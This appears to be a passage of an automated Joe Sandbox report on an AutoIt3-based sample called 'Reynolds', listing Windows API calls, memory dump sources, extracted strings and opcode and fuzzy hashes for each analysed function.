                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7AA12A02B,?,?,?,00007FF7AA129FE6), ref: 00007FF7AA133C41
                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7AA12A02B,?,?,?,00007FF7AA129FE6), ref: 00007FF7AA133CA3
                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7AA12A02B,?,?,?,00007FF7AA129FE6), ref: 00007FF7AA133CDD
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7AA12A02B,?,?,?,00007FF7AA129FE6), ref: 00007FF7AA133D07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1557788787-0
                                                                                                      • Opcode ID: 74fb27ec21b7c3bf82c39238e5a02448a96be849278828ef460b116f9bff67e0
                                                                                                      • Instruction ID: b1a1303e887023523a4ae3472be4a2aec74c7564eeae03238280e8899033e6ea
                                                                                                      • Opcode Fuzzy Hash: 74fb27ec21b7c3bf82c39238e5a02448a96be849278828ef460b116f9bff67e0
                                                                                                      • Instruction Fuzzy Hash: 8F21B131E09791D1F665AF12F440029E6B4FB84BD0B8A5175DE8E23BA4DF3CE4529328
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF7AA0F2794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF7AA13A57D), ref: 00007FF7AA0F27B1
                                                                                                      • GetCursorPos.USER32 ref: 00007FF7AA1A1861
                                                                                                      • TrackPopupMenuEx.USER32 ref: 00007FF7AA1A1885
                                                                                                      • GetCursorPos.USER32(?,?,00000000,?,?,00007FF7AA13A35D,?,?,?,?,?,?,?,?,?,00007FF7AA0F24CF), ref: 00007FF7AA1A18CC
                                                                                                      • DefDlgProcW.USER32(?,?,00000000,?,?,00007FF7AA13A35D,?,?,?,?,?,?,?,?,?,00007FF7AA0F24CF), ref: 00007FF7AA1A1910
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2864067406-0
                                                                                                      • Opcode ID: 1a3bef3f081372c109b481b3584327cd0323210818abe567890041c97091b183
                                                                                                      • Instruction ID: b166ea1be3ba6e70445661a3aeede8e0067d52b8d8bf16ee67b6d77e84e87030
                                                                                                      • Opcode Fuzzy Hash: 1a3bef3f081372c109b481b3584327cd0323210818abe567890041c97091b183
                                                                                                      • Instruction Fuzzy Hash: C5316836A09A46D2EA21EB16F4943B9A370FB88F94F954172DA4D437B4DF3CD4868710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                       • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 4127811313-0
                                                                                                      • Opcode ID: 8b43e1cc6200736644002785bf2612f5ff520a6a5f4ee2928a3ccc412ddb1b8e
                                                                                                      • Instruction ID: 1c5ab94427c315b398639867b55acce3bd176759d87a2393f26582dea64c69bb
                                                                                                      • Opcode Fuzzy Hash: 8b43e1cc6200736644002785bf2612f5ff520a6a5f4ee2928a3ccc412ddb1b8e
                                                                                                      • Instruction Fuzzy Hash: 97216B32A09647E6FA20AB05F49056EB370FB84B80F960572EB4D43B69DF3CE5528720
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                       • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3970641297-0
                                                                                                      • Opcode ID: 28ab5b73c65917a7dd8a5f113cda4927fe1f4d8d92eab68f1c80210d648ebe6f
                                                                                                      • Instruction ID: 93047cde1a53170f2aa82bcc330f2f177773dcfeb529e9b3afe9f1a57e0234d9
                                                                                                      • Opcode Fuzzy Hash: 28ab5b73c65917a7dd8a5f113cda4927fe1f4d8d92eab68f1c80210d648ebe6f
                                                                                                      • Instruction Fuzzy Hash: 2A216972A097C1DAE7A49B25E4407AAB7A0FB88B84F840139DA8D43B64DB3CD490CB00
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                       • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _ctrlfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 697997973-0
                                                                                                      • Opcode ID: ceb11bdc7e533b6efe9193ca724860c089eef8b0199c88c154fa5b9cecae704e
                                                                                                      • Instruction ID: 2672f7ae12e12e787f8116c3a5055d8c6417e8f254ac45eaa05874dee1744e0b
                                                                                                      • Opcode Fuzzy Hash: ceb11bdc7e533b6efe9193ca724860c089eef8b0199c88c154fa5b9cecae704e
                                                                                                      • Instruction Fuzzy Hash: 7511D721908641D2F612AB28F04107FD371EF9A380FB54330F7890A6B9DF2DD4468B50
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                       • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 357397906-0
                                                                                                      • Opcode ID: 8a25ac5d48612561cfd9a00adcb312ee919544b8dc510f65644f53762853102c
                                                                                                      • Instruction ID: 6df18dcfa29643d7d7c3274ba870e444e5b1d3ef7178c51d993d3df10569668f
                                                                                                      • Opcode Fuzzy Hash: 8a25ac5d48612561cfd9a00adcb312ee919544b8dc510f65644f53762853102c
                                                                                                      • Instruction Fuzzy Hash: 972138B6A04741EFEB40DF78E84019C77B0F348B88B404866EE1893B2CDB78D655CB50
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                       • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$abort
                                                                                                      • String ID:
                                                                                                      • API String ID: 1447195878-0
                                                                                                      • Opcode ID: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                                                                                                      • Instruction ID: d2487b2a218307c052500fe40cfe8013d3e9cdb8c2e30b252f780d764b6d42b3
                                                                                                      • Opcode Fuzzy Hash: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                                                                                                      • Instruction Fuzzy Hash: F0011320A0F746E2FA5BB761F5A51799171AF84790FDA44B8D91E027F6ED2CF80A4320
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                       • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                      • String ID:
                                                                                                      • API String ID: 1539411459-0
                                                                                                      • Opcode ID: ed4cd48db317d028437d79ed32fdbf2d4d468542dcded9a22e892753fecea579
                                                                                                      • Instruction ID: 5fe203777453c8d338ceb57763b0b19fd173eafd2856ca28365c9ea8ae1c473e
                                                                                                      • Opcode Fuzzy Hash: ed4cd48db317d028437d79ed32fdbf2d4d468542dcded9a22e892753fecea579
                                                                                                      • Instruction Fuzzy Hash: 0401C032A19291E2F351AB15F808739BA60AB85BA4F990174DE4A03BB1CF7DD4428B10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                       • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: gfffffff
                                                                                                      • API String ID: 3215553584-1523873471
                                                                                                      • Opcode ID: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                                                                                                      • Instruction ID: 2c08cacfd12fbedfc7a3dc50e10ec52f6b25d57f94845ce9d47eed79d7b60e29
                                                                                                      • Opcode Fuzzy Hash: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                                                                                                      • Instruction Fuzzy Hash: 55915863A0A38AD6FB239F25E1403BCAB65AB55BD0F458171CB8D073A5DA3DE11BC311
                                                                                                      APIs
                                                                                                      • OleSetContainedObject.OLE32(?,?,?,?,?,?,?,?,?,00007FF7AA1627FF), ref: 00007FF7AA162538
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                       • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContainedObject
                                                                                                      • String ID: AutoIt3GUI$Container
                                                                                                      • API String ID: 3565006973-3941886329
                                                                                                      • Opcode ID: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                                                                                                      • Instruction ID: 814f34f8fa5ca7364d3b78aec96a9ad561338900ffa61f96c8fdcc15c678214d
                                                                                                      • Opcode Fuzzy Hash: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                                                                                                      • Instruction Fuzzy Hash: 6F911872605B42D2EB25DF29E4506ADB3B4FB88B94F928026CE8D83724DF3DD856C310
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                       • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                       • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
• String ID: e+000$gfff
• API String ID: 3215553584-3030954782
• Opcode ID: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
• Instruction ID: 40e4e52020123ef3c95655364da0f0aeb70a49b957b345d6b8d9ccfc8976356c
• Opcode Fuzzy Hash: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
• Instruction Fuzzy Hash: 11515C66B197C1D6F7269F35E8403A9AAA1E740B90F898271C79C4BBE5CE2DD04BC710

APIs
• VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,000002453CA21247), ref: 000002453CA219F9
Strings
Memory Dump Source
• Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
• API String ID: 544645111-395989641
• Opcode ID: 086e72abe92c5460fcb36e8b5c9fa1987531d8d699f2152a99dadd56f0f8ef58
• Instruction ID: d5693a448426e8fcf8bc6fcee3a499123a7fcb8eec9e888672be7727374a2987
• Opcode Fuzzy Hash: 086e72abe92c5460fcb36e8b5c9fa1987531d8d699f2152a99dadd56f0f8ef58
• Instruction Fuzzy Hash: 30516C33710E74C7EB129FA6E9487982FA1F714BD4F544191DAAA07B96C73AC9C6C700

APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: Window$CreateDestroyMessageObjectSendStock
• String ID: static
• API String ID: 3467290483-2160076837
• Opcode ID: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
• Instruction ID: 3a23de68b3bdb6f4272d94dfdd289479ed8c382c8b19d715ba211a15f94a0b88
• Opcode Fuzzy Hash: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
• Instruction Fuzzy Hash: EA410A725096C2D6E671AF21F4407AEB7B1FB84790F514235EBE903A69EB3CD486CB10

APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: _snwprintf
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 3988819677-2584243854
• Opcode ID: 32885857382379a4b4f2003679ad0bf2db11e685a1a76c32f342b704b352f53d
• Instruction ID: deeabcdfa1315909e3ea5ddca373386b43b2900c2dc6936161d39ceb93d30bcb
• Opcode Fuzzy Hash: 32885857382379a4b4f2003679ad0bf2db11e685a1a76c32f342b704b352f53d
• Instruction Fuzzy Hash: E4315E76B0AB47E5FB11EB61F4801ADA371BB44B84F8240B6DA0D5766ADF38E41BC310

APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
Similarity
• API ID: _errno
• String ID: P$inity
• API String ID: 2918714741-1221812512
• Opcode ID: 8588b636597cac6a9eecc54f9e9a72e6ac2c16c1a3b101255fc09a57ffb9e336
• Instruction ID: ed8511b8a74a0de736d4833599ead58dbd1c1263c59fc5b2b6ec6bc1d7947b63
• Opcode Fuzzy Hash: 8588b636597cac6a9eecc54f9e9a72e6ac2c16c1a3b101255fc09a57ffb9e336
• Instruction Fuzzy Hash: 76314023219AE487E7638F28E4553EABBA0FB85794F045151DFC943AAADB38C5C5CB00

APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: Window$CreateMessageObjectSendStock
• String ID: $SysTabControl32
• API String ID: 2080134422-3143400907
• Opcode ID: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
• Instruction ID: 3cb0f8c7c716255a5064f4fedcc196e54a75fff58d17292e3f887c340c720ccf
• Opcode Fuzzy Hash: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
• Instruction Fuzzy Hash: FA3188725097C1CAE7609F11E44479AB7A0F384BA4F504339EAA913AE8CB3CD442CF10

APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: FileHandleType
• String ID: @
• API String ID: 3000768030-2766056989
• Opcode ID: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
• Instruction ID: 6f84703c2f0d1bef2b97a399187a0eaab53309c8f38ae49414eb2ddc4ad85f34
• Opcode Fuzzy Hash: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
• Instruction Fuzzy Hash: AE21C422E09782D1FB619B24E5A0138A660EB46774FAA0776D66E037F4CE38D887D350

APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
• Instruction ID: b6e1a5091d254d65be2ae85e662584ef8ddeab54723242a1360eb78aedca73ca
• Opcode Fuzzy Hash: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
• Instruction Fuzzy Hash: 6A315C32A09781CBE324DF25E440B5AB7B1F788790F554239EB9843BA8CB38E452CF10

APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
